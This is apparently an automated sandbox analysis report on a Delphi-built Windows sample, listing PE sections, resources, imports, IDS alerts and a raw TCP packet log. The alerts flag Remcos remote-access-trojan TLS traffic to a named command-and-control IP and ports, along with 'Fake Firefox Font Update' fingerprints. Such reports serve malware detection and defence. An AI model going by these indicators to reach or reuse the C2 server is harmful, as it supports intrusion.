                                                                      .rdata0x860000x180x200a3a3e9881b8860e96ddaaa8c82231fe5False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x870000x6bbc0x6c00f0fe8ed1efa35b6f13b7682be6eec721False0.6506438078703703data6.688109543909572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x8e0000xaaa000xaaa00947b43a4b2bd7b49f0224eb17baf1c46False0.6128934867216117data7.263650531299735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_CURSOR0x8ec280x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                      RT_CURSOR0x8ed5c0x134dataEnglishUnited States0.4642857142857143
                                                                      RT_CURSOR0x8ee900x134dataEnglishUnited States0.4805194805194805
                                                                      RT_CURSOR0x8efc40x134dataEnglishUnited States0.38311688311688313
                                                                      RT_CURSOR0x8f0f80x134dataEnglishUnited States0.36038961038961037
                                                                      RT_CURSOR0x8f22c0x134dataEnglishUnited States0.4090909090909091
                                                                      RT_CURSOR0x8f3600x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                      RT_BITMAP0x8f4940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                      RT_BITMAP0x8f6640x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                      RT_BITMAP0x8f8480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                      RT_BITMAP0x8fa180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                      RT_BITMAP0x8fbe80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                      RT_BITMAP0x8fdb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                      RT_BITMAP0x8ff880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                      RT_BITMAP0x901580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                      RT_BITMAP0x903280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                      RT_BITMAP0x904f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                      RT_BITMAP0x906c80x99ce8Device independent bitmap graphic, 772 x 272 x 24, image size 629952, resolution 2835 x 2835 px/mEnglishUnited States0.6101331445478673
                                                                      RT_BITMAP0x12a3b00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                      RT_ICON0x12a4980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5610341151385928
                                                                      RT_ICON0x12b3400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4191908713692946
                                                                      RT_ICON0x12d8e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4800656660412758
                                                                      RT_ICON0x12e9900x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6099290780141844
                                                                      RT_DIALOG0x12edf80x52data0.7682926829268293
                                                                      RT_DIALOG0x12ee4c0x52data0.7560975609756098
                                                                      RT_STRING0x12eea00x1ccTarga image data - Color 99 x 107 x 32 +68 +111 "z"0.532608695652174
                                                                      RT_STRING0x12f06c0x1c8data0.5592105263157895
                                                                      RT_STRING0x12f2340xccdata0.6764705882352942
                                                                      RT_STRING0x12f3000x114data0.6086956521739131
                                                                      RT_STRING0x12f4140x350data0.43514150943396224
                                                                      RT_STRING0x12f7640x3a4data0.38197424892703863
                                                                      RT_STRING0x12fb080x370data0.4022727272727273
                                                                      RT_STRING0x12fe780x3ccdata0.33539094650205764
                                                                      RT_STRING0x1302440x214data0.49624060150375937
                                                                      RT_STRING0x1304580xccdata0.6274509803921569
                                                                      RT_STRING0x1305240x194data0.5643564356435643
                                                                      RT_STRING0x1306b80x3c4data0.3288381742738589
                                                                      RT_STRING0x130a7c0x338data0.42961165048543687
                                                                      RT_STRING0x130db40x294data0.42424242424242425
                                                                      RT_RCDATA0x1310480x10data1.5
                                                                      RT_RCDATA0x1310580x4adeJPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 320x256, components 30.993791088385683
                                                                      RT_RCDATA0x135b380x2ecdata0.7098930481283422
                                                                      RT_RCDATA0x135e240x21dbJPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 387x191, components 30.9350409599630783
                                                                      RT_RCDATA0x1380000x483Delphi compiled form 'Tfrm_about'0.535064935064935
                                                                      RT_GROUP_CURSOR0x1384840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                      RT_GROUP_CURSOR0x1384980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                      RT_GROUP_CURSOR0x1384ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                      RT_GROUP_CURSOR0x1384c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                      RT_GROUP_CURSOR0x1384d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                      RT_GROUP_CURSOR0x1384e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                      RT_GROUP_CURSOR0x1384fc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                      RT_GROUP_ICON0x1385100x3edata0.8709677419354839
                                                                      RT_VERSION0x1385500x378data0.46734234234234234

                                                                      Imports

                                                                      DLLImport
                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                      kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                      user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                      kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                      kernel32.dllSleep
                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                      comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-26T08:12:05.411791+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949831103.186.117.15956796TCP
                                                                      2024-11-26T08:12:14.259973+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94972313.107.136.10443TCP
                                                                      2024-11-26T08:12:16.780726+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94972913.107.136.10443TCP
                                                                      2024-11-26T08:12:22.042356+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949746162.19.139.102443TCP
                                                                      2024-11-26T08:12:51.132303+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949763103.186.117.15956796TCP
                                                                      2024-11-26T08:13:14.034543+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949813103.186.117.15913939TCP
                                                                      2024-11-26T08:13:37.080639+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949823103.186.117.15956796TCP
                                                                      2024-11-26T08:13:59.329994+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949824103.186.117.15913939TCP
                                                                      2024-11-26T08:14:22.399426+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949825103.186.117.15956796TCP
                                                                      2024-11-26T08:14:45.018684+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949826103.186.117.15913939TCP
                                                                      2024-11-26T08:15:08.284779+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949827103.186.117.15956796TCP
                                                                      2024-11-26T08:15:30.463623+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949828103.186.117.15913939TCP
                                                                      2024-11-26T08:15:53.927407+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949829103.186.117.15956796TCP
                                                                      2024-11-26T08:16:16.567390+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949830103.186.117.15913939TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 26, 2024 08:12:12.127943993 CET49722443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:12.128010988 CET4434972213.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:12.128087044 CET49722443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:12.129893064 CET49722443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:12.129949093 CET4434972213.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:12.130003929 CET49722443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:12.546781063 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:12.546828985 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:12.546886921 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:12.613907099 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:12.613931894 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:14.259845018 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:14.259973049 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:14.264110088 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:14.264122963 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:14.264417887 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:14.314652920 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:14.361742020 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:14.403342962 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.219800949 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.219854116 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.219888926 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.219918013 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.219958067 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.224586010 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.224649906 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.224692106 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.247247934 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.247283936 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.247303009 CET49723443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.247311115 CET4434972313.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.252314091 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.252353907 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:15.252477884 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.252716064 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:15.252732038 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:16.779998064 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:16.780725956 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:16.780742884 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:16.782399893 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:16.782406092 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.844378948 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.844408989 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.844433069 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.844471931 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:17.844499111 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.844516993 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:17.886639118 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:17.888650894 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.888668060 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.888758898 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:17.888773918 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:17.934633970 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.031537056 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.031552076 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.031563997 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.031614065 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.031668901 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.031683922 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.055325031 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.055332899 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.055422068 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.055448055 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.055470943 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.079124928 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.079134941 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.079277992 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.079297066 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.102842093 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.102853060 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.102874994 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.102968931 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.102996111 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.103046894 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.142637014 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.211639881 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.211652040 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.211673021 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.211707115 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.211766958 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.223876953 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.223885059 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.223902941 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.223947048 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.223990917 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.224000931 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.236949921 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.236958981 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.237019062 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.237034082 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.252742052 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.252751112 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.252787113 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.252821922 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.252839088 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.252861977 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.264379025 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.264388084 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.264405012 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.264440060 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.264457941 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.264482021 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.273854017 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.273863077 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.273920059 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.273933887 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.285017014 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.285029888 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.285124063 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.285137892 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.293632030 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.293642998 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.293684959 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.293699980 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.293735027 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.334661007 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.404841900 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.404855967 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.404871941 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.404925108 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.405002117 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.405010939 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.411777973 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.411787987 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.411803961 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.411847115 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.411855936 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.411891937 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.420989990 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.420999050 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.421067953 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.421076059 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.427692890 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.427701950 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.427763939 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.427773952 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442537069 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442548037 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442573071 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442581892 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442677021 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.442677021 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.442699909 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457612038 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457644939 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457705021 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.457715988 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457766056 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.471592903 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.471636057 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.471683025 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.471695900 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.471740007 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.484517097 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.484565020 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.484606981 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.484627008 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.484673977 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.599924088 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.599957943 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.600075960 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.600109100 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.600189924 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.611474037 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.611505985 CET4434972913.107.136.10192.168.2.9
